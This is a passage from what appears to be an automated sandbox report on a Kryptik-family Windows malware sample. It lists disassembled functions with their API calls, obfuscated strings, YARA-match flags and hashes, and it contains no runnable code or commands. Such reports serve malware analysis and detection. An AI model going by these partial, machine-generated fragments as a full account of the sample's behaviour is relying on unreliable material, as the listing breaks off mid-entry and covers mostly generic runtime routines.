                                                              • Instruction Fuzzy Hash: 67E09B31601724A7C7111B50EC08A9EBE18AF0DF50F01503AFD06663A08F661A1687CC
                                                              Function 0218728A Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 02187293
                                                                • Part of subcall function 0218994F: HeapFree.KERNEL32(00000000,00000000,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?), ref: 02189965
                                                                • Part of subcall function 0218994F: GetLastError.KERNEL32(?,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?,?), ref: 02189977
                                                              • _free.LIBCMT ref: 021872A6
                                                              • _free.LIBCMT ref: 021872B7
                                                              • _free.LIBCMT ref: 021872C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 9f0fc7f5ab5ba42612596697ff71def71168718cc3928d9298bfe44f1fd2fb1c
                                                              • Instruction ID: 35509aa66dbbe982977da6e286a496b2506d9637bb6bf27fd64985aa2511c466
                                                              • Opcode Fuzzy Hash: 9f0fc7f5ab5ba42612596697ff71def71168718cc3928d9298bfe44f1fd2fb1c
                                                              • Instruction Fuzzy Hash: 18E02DB6850722EE96127F19BC9085AFA66AB48B30311602FF41416B34CF3A25929F8D
                                                              Function 00417023 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 0041702C
                                                                • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                                • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                              • _free.LIBCMT ref: 0041703F
                                                              • _free.LIBCMT ref: 00417050
                                                              • _free.LIBCMT ref: 00417061
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 30cbf7fb3445322f5385668cae4fba4876bf89921f2c2bac2e7e205206153011
                                                              • Instruction ID: 3fe777f1b78a63b08a2ef341b4c74d1d5c6aa3709f5bbb988e12ac5a6b696405
                                                              • Opcode Fuzzy Hash: 30cbf7fb3445322f5385668cae4fba4876bf89921f2c2bac2e7e205206153011
                                                              • Instruction Fuzzy Hash: 15E0B6B1901322AF8602BF1ABC114CAFA21AB54734301602FF40012A31CF3D19929F9E
                                                              Function 02186134 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 021861C4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorHandling__start
                                                              • String ID: pow
                                                              • API String ID: 3213639722-2276729525
                                                              • Opcode ID: 783fcf455c5e9adb1dbf5fd613063b1b93789f97055f9579d1309f56b5fc912d
                                                              • Instruction ID: 5f2d8c2ebee25c95ab20f098f121fe206ba47b0dad25ce6777b08f76b9eead53
                                                              • Opcode Fuzzy Hash: 783fcf455c5e9adb1dbf5fd613063b1b93789f97055f9579d1309f56b5fc912d
                                                              • Instruction Fuzzy Hash: 4A51E160EC83458ACF117734EDC137E77A9DB81754F204EA8E095422EAFB358895CE46
                                                              Function 00415ECD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 00415F5D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__start
                                                              • String ID: pow
                                                              • API String ID: 3213639722-2276729525
                                                              • Opcode ID: e9e7d915405a65ac44a64f576d2f0c225aa02c461c74bbc629d4e2f0a1954376
                                                              • Instruction ID: ca20aa04f77d04b0b03f736f75f58d2336275f3faf1d0bcf3d607f44cc30d12d
                                                              • Opcode Fuzzy Hash: e9e7d915405a65ac44a64f576d2f0c225aa02c461c74bbc629d4e2f0a1954376
                                                              • Instruction Fuzzy Hash: EB5125F1E18601D6CB11FB14C9413FB6BA4DF80781F24496BE095423A9EB3C88D69A8E
                                                              Function 0041EB4F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCPInfo.KERNEL32(0000FDE9,?,0000000C,00000000,00000000), ref: 0041EB81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID: $uA
                                                              • API String ID: 1807457897-4017129421
                                                              • Opcode ID: a14bebe26d15cb7d607a1ee63d9f01fe60d0c69c00d09c35d35dffd6adefb78f
                                                              • Instruction ID: 76fe35182010dd4070079eecf5458fb6316312039bb569af5976c5917f7ade40
                                                              • Opcode Fuzzy Hash: a14bebe26d15cb7d607a1ee63d9f01fe60d0c69c00d09c35d35dffd6adefb78f
                                                              • Instruction Fuzzy Hash: EE4150745082489BDB218B19CD84FFB7BFDEB15304F2404AED9CB87142E23CA9C59B99
                                                              Function 021869C4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, xrefs: 02186A07, 02186A0E, 02186A44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                              • API String ID: 0-3288490397
                                                              • Opcode ID: bb4cfbba668be04de8d9afecadb41173a1c3b024eb1c9cedbc90692787106584
                                                              • Instruction ID: a082cbce7b6b16d31a1bb857ffb753d70b2abb885143536f4641af7dce39eedb
                                                              • Opcode Fuzzy Hash: bb4cfbba668be04de8d9afecadb41173a1c3b024eb1c9cedbc90692787106584
                                                              • Instruction Fuzzy Hash: 574171B1E80255AFCB25FF999CC0EAEBBADEB84710F14406AF50597250DBB09A81CF50
                                                              Function 0041675D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, xrefs: 004167A0, 004167A7, 004167DD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                              • API String ID: 0-3288490397
                                                              • Opcode ID: 255b861c4cde4eb3723fb2a95b0f68a5a29e851743693505edb5e3ee1a8514b8
                                                              • Instruction ID: ae20e1325de7d9b0d380bebdbbbe849bcc95121cf4aa11dd91f3eee9ce026df2
                                                              • Opcode Fuzzy Hash: 255b861c4cde4eb3723fb2a95b0f68a5a29e851743693505edb5e3ee1a8514b8
                                                              • Instruction Fuzzy Hash: D141BFB0A01219AFDB11EF9ACC819EFBBB8EF85714B11006BF414A7251D778DA81C768
                                                              Function 0217FD87 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0217FDC6
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0217FE7A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 3480331319-1018135373
                                                              • Opcode ID: 273efe6150e4a2726b12b48060be4535457cf5dcd07bd1ee1b29e53da4973c9f
                                                              • Instruction ID: 0a1d8f7f469bca5c3498968cfdc3aecb672c5688f9b7d28cb1608833df4c5ebe
                                                              • Opcode Fuzzy Hash: 273efe6150e4a2726b12b48060be4535457cf5dcd07bd1ee1b29e53da4973c9f
                                                              • Instruction Fuzzy Hash: 7841DA34A402089FCF10DF58C884AEFBBB5AF85324F25C155EC189B792DB359A16CF91
                                                              Function 02180663 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlEncodePointer.NTDLL(00000000), ref: 02180688
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EncodePointer
                                                              • String ID: MOC$RCC
                                                              • API String ID: 2118026453-2084237596
                                                              • Opcode ID: b6581cea79e6053c56ddbaba1da26d4b44f1b87f66912959a96a6225f5ac6c40
                                                              • Instruction ID: be86047398121605db3d0ffe7226ab1d518796723ce6ed393fc2277b89a2c6b4
                                                              • Opcode Fuzzy Hash: b6581cea79e6053c56ddbaba1da26d4b44f1b87f66912959a96a6225f5ac6c40
                                                              • Instruction Fuzzy Hash: B441487294120DAFCF15EF94CC80AAEBBB6FF48304F158159F904A7260D3359955DF90
                                                              Function 004103FC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00410421
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer
                                                              • String ID: MOC$RCC
                                                              • API String ID: 2118026453-2084237596
                                                              • Opcode ID: b6581cea79e6053c56ddbaba1da26d4b44f1b87f66912959a96a6225f5ac6c40
                                                              • Instruction ID: e60aaeaf298b3da1b7730a43453d697d135fa25be288e1f3ddcf15ba3106ce2b
                                                              • Opcode Fuzzy Hash: b6581cea79e6053c56ddbaba1da26d4b44f1b87f66912959a96a6225f5ac6c40
                                                              • Instruction Fuzzy Hash: A0417971900209EFCF15DF94C981AEE7BB6FF48304F14806AFA0566252D3799AA0DF54
                                                              Function 100044D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer
                                                              • String ID: MOC$RCC
                                                              • API String ID: 2118026453-2084237596
                                                              • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                              • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                                              • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                              • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                                              Function 0041ECCF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041EA79: GetOEMCP.KERNEL32(00000000,0041ECEA,00000000,00000000,004190D3,004190D3,00000000,74DEDF80,00000000), ref: 0041EAA4
                                                              • _free.LIBCMT ref: 0041ED47
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: xX}
                                                              • API String ID: 269201875-4185209383
                                                              • Opcode ID: 1ebc31a86c70e5e5643aaa3952117f8feabc167c4cb815bc08971d7ed826ee36
                                                              • Instruction ID: 69cdd6c4c2867ef7a787bbb166e36841f429d1ebd3e145c2c29ae0f87b7b9979
                                                              • Opcode Fuzzy Hash: 1ebc31a86c70e5e5643aaa3952117f8feabc167c4cb815bc08971d7ed826ee36
                                                              • Instruction Fuzzy Hash: A331CF7590020AAFCB10DF6AD880ADF77B5EF44314F10006BFD119B2A1EB359D90CB59
                                                              Function 0218172B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: hpC
                                                              • API String ID: 269201875-2037328470
                                                              • Opcode ID: 1b100de3c26682a7f9767b5ea4feff90415715e550a8ba004f642e5c751d246c
                                                              • Instruction ID: 97ba9aaf17b238038fd758f77afa5e9c5dc53f614a383523ba12bff53bf80a36
                                                              • Opcode Fuzzy Hash: 1b100de3c26682a7f9767b5ea4feff90415715e550a8ba004f642e5c751d246c
                                                              • Instruction Fuzzy Hash: 1811E672A803126AD720BB28ACC4B257396A751734F14623EF529DB6D0FB74D4438F88
                                                              Function 02171567 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0217D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D37E
                                                                • Part of subcall function 0217D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D3BB
                                                              • __Init_thread_footer.LIBCMT ref: 021715E9
                                                                • Part of subcall function 0217D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D333
                                                                • Part of subcall function 0217D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D366
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                              • String ID: AOJ.$AY@B
                                                              • API String ID: 4132704954-514806208
                                                              • Opcode ID: b9e0837025cba329fbcf64bc808262b66bca67f2aea9b36a55b2a3a41771e812
                                                              • Instruction ID: 634c8b16a48b2693582024f35bfa8f54e63b6559580b4d4ba9335cfb29b2574d
                                                              • Opcode Fuzzy Hash: b9e0837025cba329fbcf64bc808262b66bca67f2aea9b36a55b2a3a41771e812
                                                              • Instruction Fuzzy Hash: 7A21F6709447449ADB00DF28E9553A9F372EF99324F04666DF8451B251DF7826848F88
                                                              Function 00401300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                                • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                              • __Init_thread_footer.LIBCMT ref: 00401382
                                                                • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                                • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                                • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                              • String ID: AOJ.$AY@B
                                                              • API String ID: 2296764815-514806208
                                                              • Opcode ID: 28e8001ad5e0de1ed841116e899c8068640d3552ed5b59b288d88da72c20cc32
                                                              • Instruction ID: e40916875604ea4a6387975861e2a6da87038d1f1b262f1bab1aa9f1cf823530
                                                              • Opcode Fuzzy Hash: 28e8001ad5e0de1ed841116e899c8068640d3552ed5b59b288d88da72c20cc32
                                                              • Instruction Fuzzy Hash: 6921F6709047448AD7009F79D9457A9F761EF69314F00627EF8442B2E2DF7C26848F4C
                                                              Function 021787A7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0217D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D37E
                                                                • Part of subcall function 0217D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D3BB
                                                              • __Init_thread_footer.LIBCMT ref: 02178815
                                                                • Part of subcall function 0217D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D333
                                                                • Part of subcall function 0217D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D366
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                              • String ID: G@ZK$[@G_
                                                              • API String ID: 4132704954-2338778587
                                                              • Opcode ID: 439fb9c81a17ac7d691c5378ecbccf5710fab0366b31c832fa7975013d5444bb
                                                              • Instruction ID: 24bccbee7dcdc10e71239ff62fcc014c2c0c1f7004db23fa3c1c6285003cd019
                                                              • Opcode Fuzzy Hash: 439fb9c81a17ac7d691c5378ecbccf5710fab0366b31c832fa7975013d5444bb
                                                              • Instruction Fuzzy Hash: 9801D1B0E803489BC710DBA8AC82A6DF3B2AB49710F61567EF42557290DF35A9018F89
                                                              Function 02178D67 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0217D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D37E
                                                                • Part of subcall function 0217D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D3BB
                                                              • __Init_thread_footer.LIBCMT ref: 02178DD5
                                                                • Part of subcall function 0217D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D333
                                                                • Part of subcall function 0217D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D366
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                              • String ID: G@ZK$[@G_
                                                              • API String ID: 4132704954-2338778587
                                                              • Opcode ID: 8999f0e57ceb1786d7004981ee868414a5535114fb6a47991eafc78d05310499
                                                              • Instruction ID: 04f3821096c52ec68ecbff507a604a890d5c2f9c6c68e54f019277207e9aec6e
                                                              • Opcode Fuzzy Hash: 8999f0e57ceb1786d7004981ee868414a5535114fb6a47991eafc78d05310499
                                                              • Instruction Fuzzy Hash: 4B01D1B0A903489BCB00DF68AC82A6EF3B1AB89710F50166EF02597250DF75A8008F59
                                                              Function 00408B00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                                • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                              • __Init_thread_footer.LIBCMT ref: 00408B6E
                                                                • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                                • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                                • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                              • String ID: G@ZK$[@G_
                                                              • API String ID: 2296764815-2338778587
                                                              • Opcode ID: f3c37158fd1a5ba24e5957b92d51df72453808ab86ccf4dff184a90d1cc4fc29
                                                              • Instruction ID: 17a8e3a08237a3d1dc64ba2a9f184f2dca1eb4f57e0bda546bf79f670ee7aec5
                                                              • Opcode Fuzzy Hash: f3c37158fd1a5ba24e5957b92d51df72453808ab86ccf4dff184a90d1cc4fc29
                                                              • Instruction Fuzzy Hash: 9F01D670F10348CBC710DFA89D82A6DF771AB19714F50567EF41577291DF79A8048B49
                                                              Function 00408540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                                • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                              • __Init_thread_footer.LIBCMT ref: 004085AE
                                                                • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                                • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                                • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                              • String ID: G@ZK$[@G_
                                                              • API String ID: 2296764815-2338778587
                                                              • Opcode ID: 74763786bad2c4d3dd100b184df71d5764205cf094470d97c820901261546f57
                                                              • Instruction ID: 7550eea810b6cd8f49eb53c2daec38c4b189c5a8056250b59824f6cde468e405
                                                              • Opcode Fuzzy Hash: 74763786bad2c4d3dd100b184df71d5764205cf094470d97c820901261546f57
                                                              • Instruction Fuzzy Hash: 8F01D670E10344DBC710DFA89D42569F7B1A719310F20167EF525773D1DF39A9058B89
                                                              Function 02178267 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0217D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D37E
                                                                • Part of subcall function 0217D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D3BB
                                                              • __Init_thread_footer.LIBCMT ref: 021782D0
                                                                • Part of subcall function 0217D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D333
                                                                • Part of subcall function 0217D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D366
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                              • String ID: @G@K$ZYA.
                                                              • API String ID: 4132704954-4236202813
                                                              • Opcode ID: 9134ac4aeb42c9b5666236611bf206903469005546699b8f577cb70b6e54836c
                                                              • Instruction ID: e301251d3ce623e766640b5599ffdd1a56dc18384460489634b4465c43dcf783
                                                              • Opcode Fuzzy Hash: 9134ac4aeb42c9b5666236611bf206903469005546699b8f577cb70b6e54836c
                                                              • Instruction Fuzzy Hash: 6B01ADB0A80308AFC750DF68E88595DB7B0EB98320F20517EE81597390DF386940CF59
                                                              Function 02178157 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0217D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D37E
                                                                • Part of subcall function 0217D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D3BB
                                                              • __Init_thread_footer.LIBCMT ref: 021781C0
                                                                • Part of subcall function 0217D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D333
                                                                • Part of subcall function 0217D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D366
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
